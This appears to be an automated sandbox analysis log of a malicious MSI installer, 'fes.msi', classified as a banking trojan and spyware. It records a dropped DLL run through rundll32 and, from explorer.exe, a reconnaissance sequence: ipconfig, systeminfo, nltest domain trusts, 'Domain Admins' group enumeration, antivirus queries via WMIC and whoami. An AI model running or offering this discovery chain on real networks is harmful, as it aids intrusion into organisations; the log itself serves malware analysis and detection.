Source: C:\Windows\explorer.exe	Code function: 9_2_0E65EDE0	9_2_0E65EDE0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E678DF8	9_2_0E678DF8
Source: C:\Windows\explorer.exe	Code function: 9_2_0E649D94	9_2_0E649D94
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6B9D94	9_2_0E6B9D94
Source: C:\Windows\explorer.exe	Code function: 9_2_0E66EA84	9_2_0E66EA84
Source: C:\Windows\explorer.exe	Code function: 9_2_0E650A8A	9_2_0E650A8A
Source: C:\Windows\explorer.exe	Code function: 9_2_0E690B54	9_2_0E690B54
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6A2B38	9_2_0E6A2B38
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6ADB34	9_2_0E6ADB34
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6BEBB8	9_2_0E6BEBB8
Source: C:\Windows\explorer.exe	Code function: 9_2_0E66BB94	9_2_0E66BB94
Source: C:\Windows\explorer.exe	Code function: 9_2_0E687874	9_2_0E687874
Source: C:\Windows\explorer.exe	Code function: 9_2_0E658824	9_2_0E658824
Source: C:\Windows\explorer.exe	Code function: 9_2_0E65D834	9_2_0E65D834
Source: C:\Windows\explorer.exe	Code function: 9_2_0E67481C	9_2_0E67481C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6AD8B8	9_2_0E6AD8B8
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6998B0	9_2_0E6998B0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6B4940	9_2_0E6B4940
Source: C:\Windows\explorer.exe	Code function: 9_2_0E62D9E4	9_2_0E62D9E4
Source: C:\Windows\explorer.exe	Code function: 9_2_0E698980	9_2_0E698980
Source: C:\Windows\explorer.exe	Code function: 9_2_0E649650	9_2_0E649650
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6AD63C	9_2_0E6AD63C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E645768	9_2_0E645768
Source: C:\Windows\explorer.exe	Code function: 9_2_0E69672C	9_2_0E69672C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6377E0	9_2_0E6377E0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E688788	9_2_0E688788
Source: C:\Windows\explorer.exe	Code function: 9_2_0E677448	9_2_0E677448
Source: C:\Windows\explorer.exe	Code function: 9_2_0E67E45C	9_2_0E67E45C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E692430	9_2_0E692430
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6A94F0	9_2_0E6A94F0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E66F4C4	9_2_0E66F4C4
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6884D8	9_2_0E6884D8
Source: C:\Windows\explorer.exe	Code function: 9_2_0E683498	9_2_0E683498
Source: C:\Windows\explorer.exe	Code function: 9_2_0E628568	9_2_0E628568
Source: C:\Windows\explorer.exe	Code function: 9_2_0E684564	9_2_0E684564
Source: C:\Windows\explorer.exe	Code function: 9_2_0E640540	9_2_0E640540
Source: C:\Windows\explorer.exe	Code function: 9_2_0E695534	9_2_0E695534
Source: C:\Windows\explorer.exe	Code function: 9_2_0E62453C	9_2_0E62453C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6805FC	9_2_0E6805FC
Source: C:\Windows\explorer.exe	Code function: 9_2_0E64F5FB	9_2_0E64F5FB
Source: C:\Windows\explorer.exe	Code function: 9_2_0E66B5D0	9_2_0E66B5D0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6505A0	9_2_0E6505A0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6AB370	9_2_0E6AB370
Source: C:\Windows\explorer.exe	Code function: 9_2_0E626358	9_2_0E626358
Source: C:\Windows\explorer.exe	Code function: 9_2_0E62E31C	9_2_0E62E31C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6683EC	9_2_0E6683EC
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6973A0	9_2_0E6973A0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E65E074	9_2_0E65E074
Source: C:\Windows\explorer.exe	Code function: 9_2_0E626078	9_2_0E626078
Source: C:\Windows\explorer.exe	Code function: 9_2_0E68A048	9_2_0E68A048
Source: C:\Windows\explorer.exe	Code function: 9_2_0E646038	9_2_0E646038
Source: C:\Windows\explorer.exe	Code function: 9_2_0E67F018	9_2_0E67F018
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6670C0	9_2_0E6670C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E690154	9_2_0E690154
Source: C:\Windows\explorer.exe	Code function: 9_2_0E694134	9_2_0E694134
Source: C:\Windows\explorer.exe	Code function: 9_2_0E680114	9_2_0E680114
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6501FB	9_2_0E6501FB
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6811CC	9_2_0E6811CC
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6551C0	9_2_0E6551C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E67318C	9_2_0E67318C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E63D19C	9_2_0E63D19C

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000001E51AE11484 appears 39 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E62D5A8 appears 35 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E62E160 appears 147 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E647D54 appears 31 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E62D6E8 appears 52 times
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: String function: 00CD3292 appears 66 times
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: String function: 00CD325F appears 103 times
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: String function: 00CD3790 appears 39 times

Source: avutil.dll.1.dr

Static PE information: Number of sections : 13 > 10

Source: fes.msi	Binary or memory string: OriginalFilenameviewer.exeF vs fes.msi
Source: fes.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs fes.msi

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.evad.winMSI@69/31@7/3

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CB3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

3_2_00CB3860

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CB4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

3_2_00CB4BA0

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CB45B0 LoadResource,LockResource,SizeofResource,

3_2_00CB45B0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML1751.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFF0876073A5D49207.TMP

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\Installer\MSI17D3.tmp

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain

Source: Tilu.tmp.9.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fes.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 499D87EFF8C8F588A32BFEB435A5201B
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI17D3.tmp "C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 499D87EFF8C8F588A32BFEB435A5201B	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI17D3.tmp "C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMain	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI17D3.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI17D3.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI17D3.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI17D3.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI17D3.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
